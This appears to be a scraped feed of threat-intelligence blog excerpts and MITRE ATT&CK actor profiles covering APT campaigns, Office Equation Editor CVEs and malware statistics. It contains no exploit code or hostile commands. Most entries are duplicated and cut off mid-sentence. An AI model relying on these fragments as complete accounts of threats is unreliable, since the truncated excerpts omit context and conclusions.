Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Securelist
IT threat evolution Q3 2019
blogs_securelist·2019-11-29
IT threat evolution Q3 2019
Table of Contents
Targeted attacks and malware campaigns
Mobile espionage targeting the Middle East
APT33 beefs up its toolset
New FinSpy iOS and Android implants found in the wild
Turla revamps its toolset
CloudAtlas uses new infection chain
Dtrack banking malware discovered
Other security news
Sodin ransomware attacks MSP
The impact of web mining
Mac OS threat landscape
Smart home vulnerabilities
Security of smart buildings
Smart cars and connected devices
Personal data theft
Authors
David Emm
## Targeted attacks and malware campaigns
## Mobile espionage targeting the Middle East
At the end of June we reported the details of a highly targeted campaign that we dubbed ‘Operation ViceLeaker’ involving the spread of malicious Android samples via instant messaging. The cam
Securelist
IT threat evolution Q3 2019
blogs_securelist·2019-11-29
IT threat evolution Q3 2019
Table of Contents
- Targeted attacks and malware campaigns
- Other security news
Authors
- David Emm
## Targeted attacks and malware campaigns
### Mobile espionage targeting the Middle East
At the end of June we reported the details of a highly targeted campaign that we dubbed ‘Operation ViceLeaker’ involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our Threat Intelligence Portal. We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attack
Securelist
IT threat evolution Q2 2019. Statistics
blogs_securelist·2019-08-19
IT threat evolution Q2 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
- 217,843,293 unique URLs triggered Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were
Securelist
Recent Cloud Atlas activity
blogs_securelist·2019-08-12·CVSS 7.8
[HIGH] Recent Cloud Atlas activity
Authors
GReAT
Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.
From the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.
Countries targeted by Cloud Atlas recently
Cloud Atlas hasn’t changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.
The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing ema
Securelist
Recent Cloud Atlas activity
blogs_securelist·2019-08-12·CVSS 7.8
[HIGH] Recent Cloud Atlas activity
Authors
- GReAT
Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.
From the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.
Countries targeted by Cloud Atlas recently
Cloud Atlas hasn’t changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.
The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing e
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Securelist
Spam and phishing in Q1 2019
blogs_securelist·2019-05-15
Spam and phishing in Q1 2019
Table of Contents
- Quarterly highlights
- Statistics: spam
- Statistics: phishing
- Conclusion
Authors
- Maria Vergelis
- Tatyana Shcherbakova
- Tatyana Sidorina
## Quarterly highlights
### Valentine’s Day
As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.
But most often, users were invited to order gifts for loved ones and buy medications such as Viagra. Clicking/tapping the link in such messages resulted in the victim’s payment details being sent to the cybercriminals.
### New Apple products
Late March saw the unveiling of Apple’s latest products, which fraudsters wer
Securelist
Spam and phishing in Q1 2019
blogs_securelist·2019-05-15
Spam and phishing in Q1 2019
Table of Contents
Quarterly highlights
Valentine’s Day
New Apple products
Fake technical support
New Instagram “features”
Mailshot phishing
Financial spam through the ACH system
“Dream job” offers from spammers
Ransomware and cryptocurrency
Malicious attacks on the corporate sector
Attacks on the banking sector
Statistics: spam
Proportion of spam in mail traffic
Sources of spam by country
Spam email size
Malicious attachments: malware families
Countries targeted by malicious mailshots
Statistics: phishing
Attack geography
Organizations under attack
Conclusion
Authors
Maria Vergelis
Tatyana Shcherbakova
Tatyana Sidorina
## Quarterly highlights
## Valentine’s Day
As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable conf
Zscaler
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
blogs_zscaler·2018-12-31
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Securelist
IT threat evolution Q3 2018. Statistics
blogs_securelist·2018-11-12
IT threat evolution Q3 2018. Statistics
Table of Contents
Q3 figures
Mobile threats
Q3 events
Mobile threat statistics
Distribution of detected mobile apps by type
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Attacks on IoT devices
Telnet attacks
Financial threats
Q3 events
Financial threat statistics
Geography of attacks
Cryptoware programs
Q3 events
Statistics
Number of new modifications
Number of users attacked by Trojan cryptors
Geography of attacks
Cryptominers
Statistics
Number of new modifications
Number of users attacked by cryptominers
Geography of attacks
Vulnerable apps used by cybercriminals
Attacks via web resources
Countries where online resources are seeded with malware
Countries where users faced the greatest risk of online infection
Local threats
Cou
Securelist
IT threat evolution Q3 2018. Statistics
blogs_securelist·2018-11-12
IT threat evolution Q3 2018. Statistics
Table of Contents
- Q3 figures
- Mobile threats
- Attacks on IoT devices
- Financial threats
- Cryptoware programs
- Cryptominers
- Vulnerable apps used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexander Liskin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Q3 figures
According to Kaspersky Security Network:
- Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.
- 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents can be subverted and abused to attack and compromise a Windows endpoint, some we’ve already posted about before, and some are new.
Macros
Macros are the most straight-forward way for an attacker to weaponize Office documents. Office applicatio
Unit42
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
blogs_unit42·2018-07-24
Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
## Threat Brief: Office Documents Can Be Dangerous (But We’ll Continue to Use Them Anyway)
Liat Hayun
Published: July 24, 2018
High Profile Threats
Malware
Embedded Flash files
HTA Handlers
Macros
Microsoft Office Documents
OLE Objects
Nearly all of us have a use for Microsoft Office documents. Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. Armed with the knowledge that many people will open nearly any document, even those from an untrusted source, adversaries commonly choose these files in attacks to compromise a system.
In this threat brief we show you five different ways that Office documents
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
Q1 figures
Mobile threats
Q1 events
Mobile threat statistics
Distribution of detected mobile apps by type
TOP 20 mobile malware
Geography of mobile threats
Mobile banking Trojans
Mobile ransomware Trojans
Vulnerable apps used by cybercriminals
Malicious programs online (attacks via web resources)
Online threats in the financial sector
Q1 events
Financial threat statistics
Geography of attacks
TOP 10 banking malware families
Cryptoware programs
Q1 events
Number of new modifications
Number of users attacked by Trojan cryptors
Geography of attacks
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Alexander Li
Securelist
IT threat evolution Q1 2018. Statistics
blogs_securelist·2018-05-14
IT threat evolution Q1 2018. Statistics
Table of Contents
- Q1 figures
- Mobile threats
- Vulnerable apps used by cybercriminals
- Malicious programs online (attacks via web resources)
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Alexander Liskin
- Oleg Kupreev
## Q1 figures
According to KSN:
- Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
- 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
- Ransomware attacks were registered on the computers of 179,934 unique users.
- Our File Anti-Virus logged 187,597,494 unique malicious and potentially
Zscaler
Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
blogs_zscaler·2018-04-26·CVSS 7.8
[HIGH] Malspam Campaigns Use Malicious RTF Documents | Zscaler Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Trendmicro
Tropic Trooper’s New Strategy
blogs_trendmicro·2018-03-14·CVSS 7.8
[HIGH] Tropic Trooper’s New Strategy
APT & Targeted Attacks
# Tropic Trooper’s New Strategy
Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network.
By: Jaromir Horejsi, Joey Chen, Joseph C Chen
2018/03/14
Read time: ( words)
Save to Folio
Tropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are believed to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent campaigns. Many of the tools they use now feature new behaviors, including a
Unit42
Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
blogs_unit42·2018-01-19·CVSS 7.8
CVE-2018-0802 [HIGH] Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Threat Research Center
Threat Research
Vulnerabilities
## Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Gal De Leon
Maor Dokhanian
Published: January 19, 2018
Malware
Threat Research
Vulnerabilities
CVE-2018-0802
Equation Editor
Microsoft
Last November, Microsoft manually patched a remotely exploitable vulnerability (CVE-2017-11882) in Equation Editor, which is a program that lets you write a mathematical equation into a document. Our Unit 42 research team provided a detailed analysis on this vulnerability here .
Since then, Microsoft has received additional reports from multiple security vendors that turned out to be related to another vulnerability that was successfully exploited after applying Microsoft’s update – Microsoft assigned it as CVE-2018
Unit42
Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
blogs_unit42·2018-01-19·CVSS 7.8
CVE-2017-11882 [HIGH] Traps Prevents Microsoft Office Equation Editor Zero-Day CVE-2018-0802
Last November, Microsoft manually patched a remotely exploitable vulnerability (CVE-2017-11882) in Equation Editor, which is a program that lets you write a mathematical equation into a document. Our Unit 42 research team provided a detailed analysis on this vulnerability here.
Since then, Microsoft has received additional reports from multiple security vendors that turned out to be related to another vulnerability that was successfully exploited after applying Microsoft’s update – Microsoft assigned it as CVE-2018-0802 and released a fix for it in the January 2018 monthly security updates.
The vulnerability is a stack overflow bug when parsing the long font name string in a FONT record, just like CVE-2017-11882. It can be used by attackers to execute code in the security context of the
Krebs
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
blogs_krebs·2018-01-10
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
Microsoft on Tuesday released 14 security updates, including fixes for the Spectre and Meltdown flaws detailed last week, as well as a zero-day vulnerability in Microsoft Office that is being exploited in the wild. Separately, Adobe pushed a security update to its Flash Player software.
By the time that story had published, Microsoft had already begun shipping an emergency update to address the flaws, but many readers complained that their PCs experienced the dreaded “blue screen of death” (BSOD) after applying the update. Microsoft warned that the BSOD problems were attributable to many antivirus programs not yet updating their software to play nice with the security updates.
On Tuesday, Microsoft said it was suspending the patches for computers running AMD chipsets.
“After investigati
Krebs
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
blogs_krebs·2018-01-10
Microsoft’s Jan. 2018 Patch Tuesday Lowdown
Microsoft on Tuesday released 14 security updates, including fixes for the Spectre and Meltdown flaws detailed last week, as well as a zero-day vulnerability in Microsoft Office that is being exploited in the wild. Separately, Adobe pushed a security update to its Flash Player software.
Last week’s story, Scary Chip Flaws Raise Spectre of Meltdown , sought to explain the gravity of these two security flaws present in most modern computers, smartphones, tablets and mobile devices. The bugs are thought to be mainly exploitable in chips made by Intel and ARM , but researchers said it was possible they also could be leveraged to steal data from computers with chips made by AMD .
By the time that story had published, Microsoft had already begun shipping an emergency update to address the flaw
Talos
Microsoft Patch Tuesday - January 2018
blogs_talos·2018-01-09·CVSS 7.5
[HIGH] Microsoft Patch Tuesday - January 2018
## Microsoft Patch Tuesday - January 2018
Today Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 56 new vulnerabilities with 16 of them rated critical, 39 of them rated important and 1 of them rated Moderate. These vulnerabilities impact ASP.NET, Edge, Internet Explorer, Office, Windows, and more.
In addition to the 56 vulnerabilities addressed, Microsoft has also released an update that addresses Meltdown and Spectre. Mitigations for these two vulnerabilities were published for Windows in ADV180002 . Note that due to incompatibilities with anti-virus products, users and organizations may not have received this update yet. For more information, users shoul
Talos
Microsoft Patch Tuesday - January 2018
blogs_talos·2018-01-09·CVSS 7.5
[HIGH] Microsoft Patch Tuesday - January 2018
Today Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 56 new vulnerabilities with 16 of them rated critical, 39 of them rated important and 1 of them rated Moderate. These vulnerabilities impact ASP.NET, Edge, Internet Explorer, Office, Windows, and more.
In addition to the 56 vulnerabilities addressed, Microsoft has also released an update that addresses Meltdown and Spectre. Mitigations for these two vulnerabilities were published for Windows in ADV180002. Note that due to incompatibilities with anti-virus products, users and organizations may not have received this update yet. For more information, users should refer to Microsoft's knowledge base articl
Checkpoint
Exploiting CVE-2018-0802 Office Equation Vulnerabilty Demo Video
blogs_checkpoint·2018-01-09·CVSS 7.8
CVE-2018-0802 [HIGH] Exploiting CVE-2018-0802 Office Equation Vulnerabilty Demo Video
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Exploiting CVE-2018-0802 Office Equation Vulnerabilty Demo Video
The Check Point Research team discovered a new vulnerability (CVE-2018-0802) in the Office Equation 3.0 process (EQNEDT32.E
Checkpoint
Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
blogs_checkpoint·2018-01-09·CVSS 7.8
CVE-2017-11882 [HIGH] Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Many Formulas, One Calc – Exploiting a New Office Equation Vulnerability
Research By: Omer Gull and Netanel Ben Simon
Background
A few weeks ago, a vulnerability in the Office Equation 3
Recorded Future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
blogs_recorded_future
RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
# RedAlpha: New Campaigns Discovered Targeting the Tibetan Community
Click here to download the complete analysis as a PDF.
Scope Note: Recorded Future analyzed new malware targeting the Tibetan community. This report includes a detailed analysis of the malware itself and associated infrastructure. Sources include Recorded Future’s platform, VirusTotal, ReversingLabs, and third-party metadata, as well as common OSINT and network metadata enrichments, such as DomainTools Iris and PassiveTotal, and researcher collaboration.1 The impetus of this research is twofold: to provide indicators to leverage for protection for likely victims and to raise awareness of a possible shift in adversary TTPs.
### Executive Summary
Recorded Future’s Insikt Group has identified two new cyberespionage campa
Threat Intel
Confucius (Confucius, Confucius APT)
threat_intel·CVSS 7.8
[HIGH] Confucius (Confucius, Confucius APT)
# Threat Actor Profile: Confucius
ATT&CK ID: G0142
Also known as: Confucius, Confucius APT
## Overview
Confucius is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between Confucius and Patchwork, particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)
## Techniques (TTPs)
### Resource Development
- T1583.006 Web Services
Usage: Confucius has obtained cloud storage service accounts to host stolen data.(Citation: TrendMicro Confucius APT Feb 2018)
### Initial Access
- T156
Recorded Future
Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
blogs_recorded_future·CVSS 9.8
[CRITICAL] Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
# Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets
Editor’s Note: The following post is an excerpt of a full report. To read the entire analysis, click here to download the report as a PDF.
This report details multiple campaigns conducted by the likely Chinese state-sponsored threat activity group TA413. The activity was identified through a combination of large-scale automated network traffic analytics and expert analysis. This report will be of most interest to individuals and organizations with strategic and operational intelligence requirements relating to Chinese cyber threat activity, as well as humanitarian and other organizations concerned with Tibetan interests. With thanks to our colleagues at Sophos for early sharing and collaboration.
Threat Intel
BITTER (BITTER, T-APT-17)
threat_intel·CVSS 8.8
[HIGH] BITTER (BITTER, T-APT-17)
# Threat Actor Profile: BITTER
ATT&CK ID: G1002
Also known as: BITTER, T-APT-17
Suspected origin: China
## Overview
BITTER is a suspected South Asian cyber espionage threat group that has been active since at least 2013. BITTER has targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BITTER has obtained tools such as PuTTY for use in their operations.(Citation: Forcepoint BITTER Pakistan Oct 2016)
- T1608.001 Upload Malware
Usage: BITTER has registered domains to stage payloads.(Citation: Forcepoint BITTER Pakistan Oct 2016)
- T1583.001 Domains
Usage: BITTER has regis
Threat Intel
BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
threat_intel·CVSS 7.8
[HIGH] BRONZE BUTLER (BRONZE BUTLER, REDBALDKNIGHT, Tick)
# Threat Actor Profile: BRONZE BUTLER
ATT&CK ID: G0060
Also known as: BRONZE BUTLER, REDBALDKNIGHT, Tick
Suspected origin: China
## Overview
BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.(Citation: Symantec Tick Apr 2016)
### Initial Access
- T1566.001 Spearphishing A
Crowdstrike
Two Birds, One STONE PANDA
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] Two Birds, One STONE PANDA
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Threat Intel
Tropic Trooper (Tropic Trooper, Pirate Panda, KeyBoy)
threat_intel
Tropic Trooper (Tropic Trooper, Pirate Panda, KeyBoy)
# Threat Actor Profile: Tropic Trooper
ATT&CK ID: G0081
Also known as: Tropic Trooper, Pirate Panda, KeyBoy
Suspected origin: China
## Overview
Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. Tropic Trooper focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)
## Techniques (TTPs)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(
Fortinet
FortiGuard Labs Threat Research
blogs_fortinet·CVSS 7.8
[HIGH] FortiGuard Labs Threat Research
FortiGuard Labs Threat Research
Stay connected:
THREAT RESEARCH
DPRK-Related Campaigns with LNK and GitHub C2
Analysis of DPRK-linked LNK-based attacks using GitHub as covert C2 infrastructure, detailing multi-stage PowerShell execution, persistence mechanisms, and data exfiltration techniques targeting Windows environments.
By Cara Lin April 02, 2026
THREAT RESEARCH
Cyber Fallout After the Strikes: Signal, Noise, and What Comes Next
Following U.S.-Israeli strikes on Iran, FortiGuard Labs has not yet observed large-scale cyber retaliation. However, we observed that regional cyber activity is rising. Organizations should take action to strengthen cyber hygiene, rotate credentials, and reduce exposure.
By Aamir Lakhani, Carl Windsor, and Derek Manky March 04, 2026
THREAT RESEARCH
U
Threat Intel
Tonto Team (Tonto Team, Earth Akhlut, BRONZE HUNTLEY)
threat_intel·CVSS 7.8
[HIGH] Tonto Team (Tonto Team, Earth Akhlut, BRONZE HUNTLEY)
# Threat Actor Profile: Tonto Team
ATT&CK ID: G0131
Also known as: Tonto Team, Earth Akhlut, BRONZE HUNTLEY, CactusPete, Karma Panda
Suspected origin: China
## Overview
Tonto Team is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. Tonto Team has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Te
Threat Intel
Inception (Inception, Inception Framework, Cloud Atlas)
threat_intel·CVSS 8.8
[HIGH] Inception (Inception, Inception Framework, Cloud Atlas)
# Threat Actor Profile: Inception
ATT&CK ID: G0100
Also known as: Inception, Inception Framework, Cloud Atlas
Suspected origin: Russia
## Overview
Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)
## Techniques (TTPs)
### Resource Development
- T1588.002 Tool
Usage: Inception has obtained and used open-source tools such as LaZagne.(Citation: Kaspersky Cloud Atlas August 2019)
### Initial Access
- T1566.001 Spearphishing Attachment
Usage: Ince
arXiv
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
arxiv_fulltext·2024-10-29
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
A Cascade Approach for APT Campaign Attribution in System Event Logs: Technique Hunting and Subgraph Matching
Yi-Ting Huang, Ying-Ren Guo, Guo-Wei Wong, and Meng Chang Chen
## Abstract
As Advanced Persistent Threats (APTs) grow increasingly sophisticated, the demand for effective detection methods has intensified. This study addresses the challenge of identifying APT campaign attacks through system event logs. A cascading approach, name SFM, combines Technique hunting and APT campaign attribution. Our approach assumes that real-world system event logs contain a vast majority of normal events interspersed with few suspiciously malicious ones and that these logs are annotated with Techniques of MITRE ATT&CK framework for attack pattern recognition. Then, we attribute APT campaign attacks
